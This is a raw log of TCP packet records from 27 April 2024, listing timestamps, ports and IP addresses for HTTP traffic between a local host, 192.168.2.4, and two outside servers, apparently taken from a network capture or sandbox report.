Apr 27, 2024 01:31:20.391109943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.391151905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.391319036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.391357899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.391362906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.391407967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.391608000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.391648054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.391654015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.391688108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.391694069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.391730070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.391761065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.391807079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.391963959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.392000914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.392081976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.392146111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.392412901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.392462015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.392493010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.392537117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.392550945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.392596006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.392611027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.392640114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.392735004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.392772913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.392775059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.392817974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.392909050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.392947912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.392952919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.392991066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.393064976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.393102884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.393109083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.393151999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.393219948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.393270016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.434515953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.434662104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.444082022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.444159985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.462230921 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.462342024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.463957071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.464018106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.464067936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.464123011 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.464333057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.464370012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.464392900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.464425087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.464449883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.464503050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.464570999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.464620113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.464636087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.464669943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.464823008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.464873075 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.464914083 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.464967012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.465003967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.465053082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.465069056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.465099096 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.487818003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.487889051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.583662033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.583707094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.583728075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.583745956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.583748102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.583786011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.583786964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.583825111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.583832979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.583864927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.583879948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.583911896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.583949089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.584005117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.584090948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.584142923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.584661961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.584733963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.584861040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.584901094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.584904909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.584954023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.585119009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.585165024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.585170984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.585210085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.585216045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.585249901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.585258961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.585290909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.585299015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.585335970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.585438013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.585478067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.585639954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.585695982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.586174965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.586230040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.586270094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.586321115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.586344957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.586395025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.586436987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.586474895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.586486101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.586515903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.586687088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.586728096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.586739063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.586779118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.586816072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.586859941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.586874008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.586920023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.587277889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.587316990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.587330103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.587359905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.587524891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.587573051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588255882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588295937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588309050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588336945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588349104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588376999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588382959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588418007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588422060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588455915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588463068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588495016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588502884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588534117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588540077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588572979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588577986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588618040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588649988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588690042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.588701963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.588733912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.589104891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.589145899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.630048037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.630116940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.632755041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.632834911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.634653091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.634740114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.634989023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.635027885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.635051966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.635082006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.635294914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.635333061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.635354996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.635385036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.635412931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.635451078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.635474920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.635509014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.635657072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.635695934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.635716915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.635746002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.635994911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.636033058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.636054993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.636087894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.636126041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.636181116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.639137030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.639203072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.682771921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.682878017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.778389931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.778440952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.778487921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.778498888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.778538942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.778551102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.778577089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.778588057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.778619051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.778659105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.778664112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.778697968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.778736115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.778739929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.779002905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.779042006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.779093027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.779160023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.779206038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.779449940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.779490948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.779536009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.779619932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.779659033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.779695988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.779696941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.779736042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.779773951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.779778957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.780210018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.780255079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.780338049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.780502081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.780543089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.780544996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.780581951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.780622005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.780627012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.780728102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.780767918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.780772924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.780807018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.780849934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.781141996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.781181097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.781227112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.781384945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782473087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782511950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782519102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.782551050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782597065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782598972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.782638073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782676935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782685041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.782715082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782753944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782758951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.782793999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782831907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782835960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.782870054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.782910109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.783101082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.803225040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.803267956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.803313017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.803345919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.805322886 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.805382967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.805705070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.805747032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.805763960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.805816889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.806030989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.806080103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.806094885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.806126118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.806152105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.806200027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.806215048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.806246042 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.806335926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.806375027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.806399107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.806428909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.806638002 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.806696892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.806737900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.806787014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.806801081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.806839943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.806855917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.806910038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.824673891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.824773073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.833580017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.877902985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.878006935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.924751043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.973798990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.973843098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.973884106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.973908901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.973939896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.973978043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.973995924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.974015951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974054098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974057913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.974092960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974138021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.974150896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974188089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974225998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974225998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.974266052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974303007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974333048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.974339962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.974376917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974402905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.974419117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.974442959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974482059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974519014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974523067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.974556923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974596024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974601030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.974750996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.974793911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.974805117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975087881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975126982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975131989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.975255966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975296021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975301981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.975446939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975486040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975488901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.975524902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975564003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975567102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.975604057 CEST	80	49734	176.97.76.106	192.168.2.4
